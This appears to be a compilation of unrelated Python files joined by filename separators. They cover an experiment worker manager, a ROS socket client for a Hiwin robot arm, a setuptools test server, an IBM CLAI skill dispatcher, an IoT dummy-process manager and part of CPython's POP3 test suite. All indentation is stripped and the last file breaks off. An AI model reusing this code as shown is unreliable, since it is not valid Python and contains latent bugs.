def close_all_queries(self):
""" Close all queries. """
pass
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatch experiment. """
# Set worker id and whether or not eval_time should be returned
qinfo.worker_id = worker_id # indicate which worker
qinfo = func_caller.eval_from_qinfo(qinfo, **kwargs)
if self.time_distro == 'caller_eval_cost':
qinfo.eval_time = qinfo.caller_eval_cost
else:
qinfo.eval_time = float(self.time_sampler(1))
if qinfo.eval_time is None:
eval_time = 1.0
else:
eval_time = qinfo.eval_time
qinfo.receive_time = qinfo.send_time + eval_time
# Store the result in latest_results
self.latest_results.append(qinfo)
return qinfo
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatch a single experiment. """
worker_id = self.worker_pipe[0][0]
qinfo = self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
# Sort the pipe
self.worker_pipe[0][-1] = qinfo.receive_time
self.sort_worker_pipe()
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
qinfo = self._dispatch_experiment(func_caller, qinfos[idx],
self.worker_pipe[idx][0], **kwargs)
self.worker_pipe[idx][-1] = qinfo.receive_time
self.sort_worker_pipe()
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return self.time_distro
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return 0.0
# Real worker manager - for simulating multiple workers --------------------------------
class RealWorkerManager(WorkerManager):
""" A worker manager for resnet. """
# pylint: disable=attribute-defined-outside-init
def __init__(self, worker_ids, tmp_dir,
poll_time=0.5, sleep_time_after_new_process=0.5):
""" Constructor. """
super(RealWorkerManager, self).__init__(worker_ids)
self.poll_time = poll_time
self.sleep_time_after_new_process = sleep_time_after_new_process
self.tmp_dir = tmp_dir
self._rwm_set_up()
self._child_reset()
def _rwm_set_up(self):
""" Sets things up for the child. """
# Create the result directories. """
self.result_dir_names = {wid:'%s/result_%s'%(self.tmp_dir, str(wid)) for wid in
self.worker_ids}
# Create the working directories
self.working_dir_names = {wid:'%s/working_%s/tmp'%(self.tmp_dir,
str(wid)) for wid in self.worker_ids}
# Create the last receive times
self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
# Create file names
self._result_file_name = 'result.txt'
self._num_file_read_attempts = 10
# self._file_read_poll_time = 0.5 # wait for 0.5 seconds
@classmethod
def _delete_dirs(cls, list_of_dir_names):
""" Deletes a list of directories. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
@classmethod
def _delete_and_create_dirs(cls, list_of_dir_names):
""" Deletes a list of directories and creates new ones. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
def _child_reset(self):
""" Resets child. """
# Delete/create the result and working directories.
if not hasattr(self, 'result_dir_names'): # Just for the super constructor.
return
self._delete_and_create_dirs(list(self.result_dir_names.values()))
self._delete_dirs(list(self.working_dir_names.values()))
self.free_workers = Set(self.worker_ids)
self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
self.worker_processes = {wid:None for wid in self.worker_ids}
def _get_result_file_name_for_worker(self, worker_id):
""" Computes the result file name for the worker. """
return os.path.join(self.result_dir_names[worker_id], self._result_file_name)
def _read_result_from_file(self, result_file_name):
""" Reads the result from the file name. """
#pylint: disable=bare-except
num_attempts = 0
while num_attempts < self._num_file_read_attempts:
try:
file_reader = open(result_file_name, 'r')
read_in = file_reader.read().strip()
try:
# try converting to float. If not successful, it is likely an error string.
read_in = float(read_in)
except:
pass
file_reader.close()
result = read_in
break
except:
print('Encountered error when reading %s. Trying again.'%(result_file_name))
time.sleep(self.poll_time)
file_reader.close()
result = EVAL_ERROR_CODE
return result
def _read_result_from_worker_and_update(self, worker_id):
""" Reads the result from the worker. """
# Read the file
result_file_name = self._get_result_file_name_for_worker(worker_id)
val = self._read_result_from_file(result_file_name)
# Now update the relevant qinfo and put it to latest_results
qinfo = self.qinfos_in_progress[worker_id]
qinfo.val = val
qinfo.receive_time = self.experiment_designer.get_curr_spent_capital()
qinfo.eval_time = qinfo.receive_time - qinfo.send_time
if not hasattr(qinfo, 'true_val'):
qinfo.true_val = val
self.latest_results.append(qinfo)
# Update receive time
self.last_receive_times[worker_id] = qinfo.receive_time
# Delete the file.
os.remove(result_file_name)
# Delete content in a working directory.
shutil.rmtree(self.working_dir_names[worker_id])
# Add the worker to the list of free workers and clear qinfos in progress.
self.worker_processes[worker_id].terminate()
self.worker_processes[worker_id] = None
self.qinfos_in_progress[worker_id] = None
self.free_workers.add(worker_id)
def _worker_is_free(self, worker_id):
""" Checks if worker with worker_id is free. """
if worker_id in self.free_workers:
return True
worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
if os.path.exists(worker_result_file_name):
self._read_result_from_worker_and_update(worker_id)
else:
return False
def _get_last_receive_time(self):
""" Returns the last time we received a job. """
all_receive_times = list(self.last_receive_times.values())
return max(all_receive_times)
def a_worker_is_free(self):
""" Returns true if a worker is free. """
for wid in self.worker_ids:
if self._worker_is_free(wid):
return self._get_last_receive_time()
return None
def all_workers_are_free(self):
""" Returns true if all workers are free. """
all_are_free = True
for wid in self.worker_ids:
all_are_free = self._worker_is_free(wid) and all_are_free
if all_are_free:
return self._get_last_receive_time()
else:
return None
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatches experiment to worker_id. """
#pylint: disable=star-args
if self.qinfos_in_progress[worker_id] is not None:
err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
str(self.qinfos_in_progress), str(self.free_workers))
print(err_msg)
raise ValueError('Check if worker is free before sending experiment.')
# First add all the data to qinfo
qinfo.worker_id = worker_id
qinfo.working_dir = self.working_dir_names[worker_id]
qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
# Create the working directory
os.makedirs(qinfo.working_dir)
# Dispatch the experiment in a new process
target_func = lambda: func_caller.eval_from_qinfo(qinfo, **kwargs)
self.worker_processes[worker_id] = Process(target=target_func)
self.worker_processes[worker_id].start()
time.sleep(self.sleep_time_after_new_process)
# Add the qinfo to the in progress bar and remove from free_workers
self.qinfos_in_progress[worker_id] = qinfo
self.free_workers.discard(worker_id)
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches a single experiment to a free worker. """
worker_id = self.free_workers.pop()
self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches a batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
self._dispatch_experiment(func_caller, qinfos[idx], self.worker_ids[idx], **kwargs)
def close_all_queries(self):
""" Closes all queries. """
pass
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return 'realtime'
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return self.poll_time
|
Hiwin_RT605_ArmCommand_Socket_20190627192450.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
server.py
|
"""Basic http server for tests to simulate PyPI or custom indexes
"""
import time
import threading
from setuptools.extern.six.moves import BaseHTTPServer, SimpleHTTPServer
class IndexServer(BaseHTTPServer.HTTPServer):
"""Basic single-threaded http server simulating a package index
You can use this server in unittest like this::
s = IndexServer()
s.start()
index_url = s.base_url() + 'mytestindex'
# do some test requests to the index
# The index files should be located in setuptools/tests/indexes
s.stop()
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=SimpleHTTPServer.SimpleHTTPRequestHandler):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandlerClass)
self._run = True
def start(self):
self.thread = threading.Thread(target=self.serve_forever)
self.thread.start()
def stop(self):
"Stop the server"
# Let the server finish the last request and wait for a new one.
time.sleep(0.1)
self.shutdown()
self.thread.join()
self.socket.close()
def base_url(self):
port = self.server_port
return 'http://127.0.0.1:%s/setuptools/tests/indexes/' % port
class RequestRecorder(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
requests = vars(self.server).setdefault('requests', [])
requests.append(self)
self.send_response(200, 'OK')
class MockServer(BaseHTTPServer.HTTPServer, threading.Thread):
"""
A simple HTTP Server that records the requests made to it.
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=RequestRecorder):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandlerClass)
threading.Thread.__init__(self)
self.setDaemon(True)
self.requests = []
def run(self):
self.serve_forever()
@property
def url(self):
return 'http://localhost:%(server_port)s/' % vars(self)
|
service.py
|
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import time
import threading
# itemgetter is faster than lambda functions for sorting
from operator import itemgetter
import clai.server.plugins.nlc2cmd.wa_skills as wa_skills
class Service:
def __init__(self):
pass
def __call__(self, *args, **kwargs):
# call to WA evaluators
def __compute(*args):
result.append( eval('wa_skills.' + args[0])(args[1]) )
# Extract user input
msg = args[0]
result = []
threads = []
for item in dir(wa_skills):
if 'wa_skill_processor' in item:
threads.append( threading.Thread(target=__compute, args=(item, msg)) )
for t in threads: t.start()
for t in threads: t.join()
# return wa skill with the highest confidence
return sorted(result, key=itemgetter(1), reverse=True)[0]
|
Anakin.py
|
import multiprocessing
import threading
import subprocess
import socket
import time, datetime
import logging, logging.config
import addresses
from UP import up_client
from CP import cp_utils
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('ANAKIN')
my_dummies = {5021: ['python3', 'Dummies/radio.py'],
5022: ['python3', 'Dummies/temp.py']}
# name -> (subprocess, port) GLOBAL UNLOCKED (só dummy update deve mexer)
dummy_processes = {}
# name -> (lock, shared socket) GLOBAL locked name by name
name_lock_sockets = {}
# shared lock to synchronize certificate updating and everybody else
# name -> (lock, shared cert) GLOBAL
cert_store = {'UP': [threading.Lock(), None]}
UPDATE_SLEEP = 30
MONOTORING_SLEEP = 8
RETRY_FAILURES = 5
RETRY_SLEEP = 0.2
CHUNK_SIZE = 4096
def shutdown_dummy(s, dummy, logger=logger):
try:
s.sendall(b'kill')
r = s.recv(3)
if r != b'ack':
print("This is weird, should not happen")
dummy.wait(timeout=5) #5 seconds
return True
except BrokenPipeError:
pass #maybe was already dead
except:
return False
def start_dummy(command, port, logger=logger):
#proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
proc = subprocess.Popen(cmd, stdout=1, stderr=2)
attempts, success = 0, False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while attempts < RETRY_FAILURES and success == False:
attempts += 1
time.sleep(RETRY_SLEEP) # give time for setting up socket
try:
s.connect(('127.0.0.1', port))
success = True
break
except ConnectionRefusedError:
pass
if not success:
print("Unable to connect to program {} on port {}".format(command, port))
return
s.sendall(b'name')
name = str(s.recv(10), 'ascii')
name_lock_sockets[name] = (threading.Lock(), s)
dummy_processes[name] = (proc, port)
def thread_dispatch_rcp():
logger = logging.getLogger('ANAKIN_RCP')
logger.info('Waiting for commands')
while True:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.debug('Trying to bind on port %s', 5679)
s.bind(addresses.ANAKIN_RCP)
s.listen(1)
logger.debug('Waiting for connection on %s', s.getsockname())
conn, addr = s.accept()
logger.info('Received connection from %s', addr)
try:
while True:
the_query = conn.recv(16).decode('utf-8').strip()
logger.debug('Got "%s" on the pipe', the_query)
if the_query == 'quit':
break
try:
name, rest = the_query.split("|", 1)
except Exception:
conn.sendall(b'Bad format')
continue
if name not in name_lock_sockets:
conn.sendall(b'Dummy not found')
continue
lock = name_lock_sockets[name][0]
with lock:
s = name_lock_sockets[name][1]
s.sendall(bytes(rest, 'ascii'))
response = s.recv(256)
logger.debug('Responding with "%s"', response)
conn.sendall(response)
except BrokenPipeError:
logger.warning('%s disconnected without "quit"', addr)
def thread_what_mp():
logger = logging.getLogger('ANAKIN_MP')
conn = socket.create_connection(addresses.HEIMDALL_MP)
#while True:
try:
while True:
conn.sendall(b'anakin|what')
size_result = int.from_bytes(conn.recv(8), 'big')
the_query = conn.recv(size_result).decode('utf-8').strip()
logger.debug('Got "%s" on the pipe', the_query)
if the_query == 'quit':
break
try:
query_vec = the_query.split("|")
except Exception:
conn.sendall(b'Bad format')
continue
for name in query_vec:
if name not in name_lock_sockets:
conn.sendall(b'Dummy not found')
continue
lock = name_lock_sockets[name][0]
with lock:
s = name_lock_sockets[name][1]
s.sendall(b'read')
response = s.recv(256) + b'|'
logger.debug('Responding with "%s"', response)
conn.sendall(response)
time.sleep(MONOTORING_SLEEP)
except BrokenPipeError:
logger.warning('%s disconnected without "quit"', addr)
def thread_dummy_update():
logger = logging.getLogger('ANAKIN_UP')
while True:
logger.info('Checking for updates')
num = 0
for name, (lock, s) in name_lock_sockets.items():
cert_lock = cert_store['UP'][0]
with cert_lock, lock:
pubkey = cert_store['UP'][1]
if not pubkey:
logger.warning('Cannot update while no UP certificates are known')
break
else:
pubkey = pubkey.public_key()
s = name_lock_sockets[name][1]
logger.debug('Get id and version from %s', name)
s.sendall(b'id')
dummy_id = s.recv(10)
logger.debug('%s -- id: %s', name, dummy_id)
s.sendall(b'version')
dummy_version = s.recv(32)
logger.debug('%s -- version: %s', name, dummy_version)
file_name = 'Dummies/{}.py'.format(name) # FIXME: not general
proc, port = dummy_processes[name]
res = up_client.try_update(dummy_id,
dummy_version,
file_name,
lambda: shutdown_dummy(s,proc),
pubkey,
logger=logger)
logger.debug('Return value: %s', res)
if res[1] == True: # There was an update
logger.info('Dummy "%s" needs to be restarted', name)
num += 1
start_dummy(my_dummies[port], port)
logger.info('Updated %s dummies', num)
time.sleep(UPDATE_SLEEP)
def thread_certificate_checking():
logger = logging.getLogger('ANAKIN_CP')
def get_pem_from_arch(what, filename, date_for_update=datetime.datetime.today()):
if date_for_update < datetime.datetime.today():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# Connect to server and send update version request
#pdb.set_trace()
try:
logger.debug('Getting new %s', what)
sock.connect(addresses.ARCHITECT_CP)
sock.sendall(bytes(what, 'utf-8'))
size = int.from_bytes(sock.recv(8), 'big')
with open(filename, 'wb') as outfile:
while size > 0:
chunk = sock.recv(CHUNK_SIZE if CHUNK_SIZE < size else size)
outfile.write(chunk)
size -= len(chunk)
logger.debug('Finished getting %s', what)
except (ConnectionRefusedError, BrokenPipeError):
logger.warning('Unable to connect to Certificate Server in %s', 'architect')
# compatibility hack
class Object(object):
pass
res = Object()
res.next_update = date_for_update
res.not_valid_after = date_for_update
return res
else:
logger.debug('Not getting new %s', what)
if what == 'CRL':
crl = cp_utils.read_crl(filename)
return crl
else:
cert = cp_utils.read_cert(filename)
return cert
# here I just want to fetch it
up_cert = get_pem_from_arch('UP', 'anakin_current_up_cert.pem')
crl_next_update = datetime.datetime.today()
while True:
cert_lock = cert_store['UP'][0]
with cert_lock:
crl = get_pem_from_arch('CRL', 'anakin_current_crl.pem', crl_next_update)
while not cp_utils.check_certificate('anakin_current_up_cert.pem', 'root_cert.pem', 'anakin_current_crl.pem'):
logger.warning('No valid UP certificate')
time.sleep(5)
up_cert = get_pem_from_arch('UP', 'anakin_current_up_cert.pem')
crl = get_pem_from_arch('CRL', 'anakin_current_crl.pem', crl.next_update)
logger.info('Got valid certificates')
cert_store['UP'][1] = up_cert
crl_next_update = crl.next_update
nearest_datetime = crl.next_update if crl.next_update < up_cert.not_valid_after else up_cert.not_valid_after
time.sleep(((nearest_datetime-datetime.datetime.today())/2).seconds)
if __name__ == '__main__':
#global dummy_processes, name_lock_sockets
#global logger
# Launch Dummies
logger.info('Start launching %s dummies', len(my_dummies))
logger.debug('Dummies dict: %s', my_dummies)
for port, cmd in my_dummies.items():
start_dummy(cmd, port)
# CP
logger.info('Starting Certificate Protocol thread')
cp = threading.Thread(target=thread_certificate_checking, args=[], daemon=True)
cp.start()
# UP
logger.info('Starting Update Protocol thread')
up = threading.Thread(target=thread_dummy_update, args=[], daemon=True)
up.start()
# RCP #todo refactorize this to use the thread for everything?
logger.info('Starting Remote Control Protocol thread')
rcp_thread = threading.Thread(target=thread_dispatch_rcp, args=[], daemon=True)
rcp_thread.start()
# MP
logger.info('Starting Monotoring Protocol thread')
mp_thread = threading.Thread(target=thread_what_mp, args=[], daemon=True)
mp_thread.start()
#time.sleep(5000)
input("Press enter to kill them all")
logger.info('Shutting down dummies')
for dummy, port in dummy_processes.values():
dummy.terminate()
logger.debug('Dummy on port %s exited with %s return code', port, dummy.wait())
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
import threading
from unittest import TestCase, skipUnless
from test import support as test_support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
HOST = socket_helper.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif ("SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1] or
"SSLV3_ALERT_CERTIFICATE_UNKNOWN" in err.args[1]):
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
try:
while self.active and asyncore.socket_map:
with self.active_lock:
asyncore.loop(timeout=0.1, count=1)
finally:
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
